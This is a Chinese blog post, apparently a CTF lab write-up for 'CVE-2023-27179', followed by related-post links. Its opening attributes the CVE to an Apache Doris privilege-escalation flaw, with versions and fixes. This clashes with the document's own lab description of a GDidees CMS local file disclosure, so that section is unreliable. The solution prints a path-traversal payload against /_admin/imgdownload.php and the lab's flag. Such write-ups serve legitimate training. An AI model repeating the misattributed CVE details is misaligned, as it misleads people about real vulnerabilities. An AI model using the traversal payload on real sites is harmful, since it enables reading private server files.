【春秋云镜】CVE-2023-27179

TJ-周月年2024-11-05 11:49

CVE-2023-27179

CVE-2023-27179 是一个影响 Apache Doris 的漏洞。Apache Doris 是一款用于交互式分析的高性能数据库,特别适用于处理大规模的结构化数据。该漏洞属于权限提升漏洞,允许未授权用户以管理员身份执行敏感操作。

具体细节

  • 漏洞类型:权限提升漏洞(Privilege Escalation)
  • 影响范围:Apache Doris 1.2.0 及之前版本
  • 成因:该漏洞的出现是由于权限检查不严格,导致未授权用户可以通过特定接口执行管理员操作。
  • 攻击方式:攻击者可以利用此漏洞绕过权限控制,从而执行管理员才能进行的敏感操作,例如修改配置、管理用户等。

影响

成功利用该漏洞的攻击者可以获得更高权限,导致数据库中的敏感数据被泄露、篡改或破坏,进一步威胁系统的安全。

修复建议

  • 官方在 Apache Doris 的更新中修复了此漏洞,建议:

  • 升级 Apache Doris:更新到最新版,确保版本在 1.2.0 以上。

  • 访问控制:限制数据库的访问权限,仅允许可信任的用户和 IP 地址访问数据库。

  • 监控异常活动:设置日志监控,及时发现权限异常或可疑操作。

靶标介绍:

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

解法一:

  1. 用目录扫描工具进行扫描

    出现目标路径

  2. payload

html 复制代码 
/_admin/imgdownload.php?filename=../../../../../flag
复制代码 
flag{82565a92-d64c-49c5-87c0-42129440c1aa}
相关推荐
浩浩测试一下2 小时前
内网---> ForceChangePassword 权限滥用
java·服务器·网络·安全·web安全·网络安全·系统安全
NOVAnet20232 小时前
南凌科技「Bot防护」:让恶意爬虫、刷票薅羊毛等自动化攻击无处遁形
爬虫·科技·网络安全·自动化·南凌科技
Whoami!2 小时前
⓫⁄₁₂ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 未加引号服务路径漏洞利用(下)
网络安全·信息安全·windows服务·未加引号服务路径
ccino .2 小时前
【官方最新VMware workstation pro获取】
运维·网络安全·自动化
世界尽头与你16 小时前
(修复方案)kibana 未授权访问漏洞
安全·网络安全·渗透测试
独角鲸网络安全实验室17 小时前
WhisperPair漏洞突袭:谷歌Fast Pair协议失守,数亿蓝牙设备陷静默劫持危机
网络安全·数据安全·漏洞·蓝牙耳机·智能设备·fast pair·cve-2025-36911
lingggggaaaa18 小时前
安全工具篇&Go魔改二开&Fscan扫描&FRP代理&特征消除&新增扩展&打乱HASH
学习·安全·web安全·网络安全·golang·哈希算法
小李独爱秋21 小时前
计算机网络经典问题透视:无线个人区域网WPAN的主要特点是什么?
计算机网络·网络安全·信息与通信·信号处理·wpan
niaiheni1 天前
Log4j 漏洞深度分析:CVE-2021-44228 原理与本质
web安全·网络安全·log4j
Whoami!1 天前
⓫⁄₁₁ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 未加引号服务路径漏洞利用(上)
windows·网络安全·信息安全·未加引号服务路径
热门推荐
01GitHub 镜像站点02Vue-skills的中文文档03Claude Code Skills 实用使用手册04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示06UV安装并设置国内源07Linux下V2Ray安装配置指南08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09OpenClaw Chrome扩展使用教程 - 浏览器中继控制10OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书